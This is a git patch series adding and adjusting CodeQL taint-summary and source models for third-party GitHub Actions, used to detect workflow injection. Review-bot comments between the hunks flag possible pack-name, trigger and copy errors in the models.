.../ext/metro-digital_setup-tools-for-waas.model.yml | 6 ++++++ ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 6 ++++++ 
ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 ++++++ ql/lib/ext/ruby_setup-ruby.model.yml | 6 ++++++ ...alsify_action-detect-and-tag-new-version.model.yml | 6 ++++++ ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 6 ++++++ ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 6 ++++++ ql/lib/ext/suisei-cn_actions-download-file.model.yml | 6 ++++++ ql/lib/ext/timheuer_base64-to-file.model.yml | 7 +++++++ ql/lib/ext/tzkhan_pr-update-action.model.yml | 6 ++++++ ql/lib/ext/xt0rted_slash-command-action.model.yml | 7 +++++++ 40 files changed, 251 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/akhileshns_heroku-deploy.model.yml create mode 100644 ql/lib/ext/android-actions_setup-android.model.yml create mode 100644 ql/lib/ext/apple-actions_import-codesign-certs.model.yml create mode 100644 ql/lib/ext/ashley-taylor_read-json-property-action.model.yml create mode 100644 ql/lib/ext/ashley-taylor_regex-property-action.model.yml create mode 100644 ql/lib/ext/aszc_change-string-case-action.model.yml create mode 100644 ql/lib/ext/aws-actions_configure-aws-credentials.model.yml create mode 100644 ql/lib/ext/bobheadxi_deployments.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-breaking-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-lint-action.model.yml create mode 100644 ql/lib/ext/cachix_cachix-action.model.yml create mode 100644 ql/lib/ext/coursier_cache-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml create mode 100644 ql/lib/ext/csexton_release-asset-action.model.yml create mode 100644 ql/lib/ext/delaguardo_setup-clojure.model.yml create mode 100644 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-test-runner.model.yml create mode 100644 ql/lib/ext/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/github_codeql-action.model.yml create mode 100644 ql/lib/ext/gradle_gradle-build-action.model.yml create mode 100644 
ql/lib/ext/haya14busa_action-cond.model.yml create mode 100644 ql/lib/ext/hexlet_project-action.model.yml create mode 100644 ql/lib/ext/jsdaniell_create-json.model.yml create mode 100644 ql/lib/ext/jwalton_gh-ecr-push.model.yml create mode 100644 ql/lib/ext/khan_pull-request-comment-trigger.model.yml create mode 100644 ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml create mode 100644 ql/lib/ext/mattdavis0351_actions.model.yml create mode 100644 ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml create mode 100644 ql/lib/ext/mishakav_pytest-coverage-comment.model.yml create mode 100644 ql/lib/ext/mymindstorm_setup-emsdk.model.yml create mode 100644 ql/lib/ext/ruby_setup-ruby.model.yml create mode 100644 ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml create mode 100644 ql/lib/ext/shallwefootball_upload-s3-action.model.yml create mode 100644 ql/lib/ext/shogo82148_actions-setup-perl.model.yml create mode 100644 ql/lib/ext/suisei-cn_actions-download-file.model.yml create mode 100644 ql/lib/ext/timheuer_base64-to-file.model.yml create mode 100644 ql/lib/ext/tzkhan_pr-update-action.model.yml create mode 100644 ql/lib/ext/xt0rted_slash-command-action.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml new file mode 100644 index 00000000000..73e49a1fb06 --- /dev/null +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml new file mode 100644 index 00000000000..11ea0ae7922 --- /dev/null +++ b/ql/lib/ext/android-actions_setup-android.model.yml 
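Review bot: The model files created in this commit, starting with `akhileshns_heroku-deploy.model.yml`, declare `pack: codeql/actions-all`, while the model files touched by the previous commit (for example `tj-actions_branch-names.model.yml`) use `pack: githubsecuritylab/actions-all`. `addsTo.pack` has to name the pack that declares the extensible predicate; rows addressed to a different pack are presumably not applied, which would leave the corresponding flow steps and sources silently missing from the analysis. The pack name in `qlpack.yml` is not visible here, so one of the two spellings should be confirmed against it and used in every `ql/lib/ext/*.model.yml` file.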
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml new file mode 100644 index 00000000000..2fdf6c78d53 --- /dev/null +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml new file mode 100644 index 00000000000..fb837050879 --- /dev/null +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml new file mode 100644 index 00000000000..d3b929956d1 --- /dev/null +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml new file mode 100644 index 00000000000..f4527cf1b7f 
--- /dev/null +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml new file mode 100644 index 00000000000..f9510094295 --- /dev/null +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml new file mode 100644 index 00000000000..a458e229e04 --- /dev/null +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file 
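Review bot: In `aszc_change-string-case-action.model.yml` the `output.uppercase` and `output.lowercase` rows take taint from `input.replace-with`, which looks copied from the replace-string model; only `output.capitalized` is fed from `input.string`. If the action has no `replace-with` input (to be confirmed against its `action.yml`), taint through the upper- and lower-cased outputs is lost and injections that pass through this step go unreported. The rows would then read `["aszc/change-string-case-action", "*", "input.string", "output.uppercase", "taint"]` and the same for `output.lowercase`.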
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml new file mode 100644 index 00000000000..a6cfbb6ee9e --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml new file mode 100644 index 00000000000..9fb754ea9e1 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml new file mode 100644 index 00000000000..bd9563317fb --- /dev/null +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml new file mode 100644 index 00000000000..951a297207d --- /dev/null +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml new file mode 100644 index 00000000000..ab6458028a5 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml new file mode 100644 index 00000000000..084e3328dc8 --- /dev/null +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml new file mode 100644 index 00000000000..b2872259fe9 --- /dev/null +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e..79fd5c76e4a 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml new file mode 100644 index 00000000000..8475cb66c02 --- /dev/null 
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml new file mode 100644 index 00000000000..a0d4b357b5a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml new file mode 100644 index 00000000000..d416a71c91d --- /dev/null +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml new file mode 100644 index 00000000000..3710f7e07b8 --- /dev/null +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml new file mode 100644 index 00000000000..6ea8a6c6800 --- /dev/null +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml 
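Review bot: Both `franzdiebold/github-env-vars-action` rows use the trigger `pull_request`, whereas the preceding commit removed every `pull_request` row from the other source models and kept only `pull_request_target`. Since the trigger column now decides whether the critical query reports a finding, these two outputs would be flagged as critical in plain `pull_request` workflows and not reported by it in `pull_request_target` ones. If the earlier narrowing was deliberate, both rows should use `"pull_request_target"` as well.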
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml new file mode 100644 index 00000000000..f0e0752b735 --- /dev/null +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml new file mode 100644 index 00000000000..4499d91cab6 --- /dev/null +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml new file mode 100644 index 00000000000..a0f59b9e38b --- /dev/null +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] \ No newline at end of file 
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
new file mode 100644
index 00000000000..8ae3bb0035d
--- /dev/null
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
new file mode 100644
index 00000000000..d95c69bc5b1
--- /dev/null
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""]
\ No newline at end of file
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
new file mode 100644
index 00000000000..3c60de5bb0a
--- /dev/null
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"]
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 46a577d2f7e..8358159bd40 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
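Review bot: The second row of `khan_pull-request-comment-trigger.model.yml` keys the source on `pull_request_comment`, which is not a GitHub Actions event name; comments on a pull request conversation arrive as `issue_comment` and comments on its diff as `pull_request_review_comment`. If the fourth column is compared with the workflow's `on:` triggers (the matching code is not part of this hunk), that row can never match and the model looks broader than it is. Either drop the row or replace the trigger with an event the action really handles, and note the choice in a comment such as `# comment_body is attacker-controlled for any commenter`. The same trigger value is used in `xt0rted_slash-command-action.model.yml`, and both files leave the last column `""` where the franzdiebold model gives a description like `"PR body"`.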
@@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml new file mode 100644 index 00000000000..54302b86e83 --- /dev/null +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml new file mode 100644 index 00000000000..7904383d707 --- /dev/null +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml new file mode 100644 index 00000000000..0c283016c86 --- /dev/null +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] 
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml new file mode 100644 index 00000000000..2694ec2c453 --- /dev/null +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml new file mode 100644 index 00000000000..aee6172b591 --- /dev/null +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml new file mode 100644 index 00000000000..2167b16c7ba --- /dev/null +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml new file mode 100644 index 00000000000..d90d7109fc2 --- /dev/null +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml new file mode 100644 index 00000000000..20a412fd9b7 --- /dev/null +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml new file mode 100644 index 00000000000..8d0731c9792 --- /dev/null +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml new file mode 100644 index 00000000000..9364fd74752 --- /dev/null +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml new file mode 100644 index 00000000000..f16b69c7af9 --- /dev/null +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml new file mode 100644 index 00000000000..59a4c5b5652 --- /dev/null +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml 
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""]
From a28f8e90f071c29067eb4fa51a88a25e85dd57b1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 21 Feb 2024 16:50:33 +0100
Subject: [PATCH 0066/1267] Update ql/lib/ext/tj-actions_branch-names.model.yml
---
 ql/lib/ext/tj-actions_branch-names.model.yml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index 20383f415c2..1618eddf2d8 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -4,7 +4,6 @@ extensions:
 extensible: sourceModel
 data:
 # https://github.com/tj-actions/branch-names
- - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"]
 - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"]
 - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"]
 - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"]
From 3d5567d6988c4e4197014a2111393f003842b466 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 21 Feb 2024 16:50:44 +0100
Subject: [PATCH 0067/1267] Update ql/lib/codeql/actions/Ast.qll
Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com>
---
 ql/lib/codeql/actions/Ast.qll | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 2e93187b6bf..8f04005be8f 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -23,7 +23,7 @@ class AstNode instanceof YamlNode {
 class Statement extends AstNode {
 /** Gets the workflow that this job is a part of. */
 WorkflowStmt getEnclosingWorkflowStmt() {
- exists(WorkflowStmt w | w.getAChildNode*() = this and result = w)
+ this = result.getAChildNode*()
 }
 }
From 9e2be7d67445a3f9ff64ae614ac689b4dabb5b77 Mon Sep 17 00:00:00 2001
From: Jorge <46056498+jorgectf@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:27:39 +0100
Subject: [PATCH 0068/1267] Apply suggestions from code review
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Alvaro Muñoz
---
 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index 8475cb66c02..c08e6f1b396 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"]
From d0b904a5907e7a1369de76723db344bf18381270 Mon Sep 17 00:00:00 2001
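Review bot: The doc comment kept as context above `getEnclosingWorkflowStmt()` still says "the workflow that this job is a part of", but the predicate is declared on `Statement`, so it answers for every statement and not only for jobs; `/** Gets the workflow that this statement is a part of. */` would match the code. The rewritten body uses the reflexive closure `getAChildNode*()`, so if `WorkflowStmt` is itself a `Statement` (its declaration is outside this hunk) a workflow is reported as its own enclosing workflow, exactly as before the change. If that is intended, one more sentence in the same comment saying so would save the next reader from checking.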
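Review bot: With both rows of `franzdiebold_github-env-vars-action.model.yml` switched to `pull_request_target`, a workflow that runs this action under `on: pull_request` no longer has `output.CI_PR_TITLE` or `output.CI_PR_DESCRIPTION` modelled as a source, although the PR title and body are author-controlled under either trigger. If the narrowing is deliberate because fork-originated `pull_request` runs get a read-only token and no secrets by default, record that next to the rows, for example `# pull_request omitted on purpose: fork runs are unprivileged by default`. Otherwise keep one row per trigger so both cases are covered. How the fourth column is matched against the workflow is not visible in this hunk.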
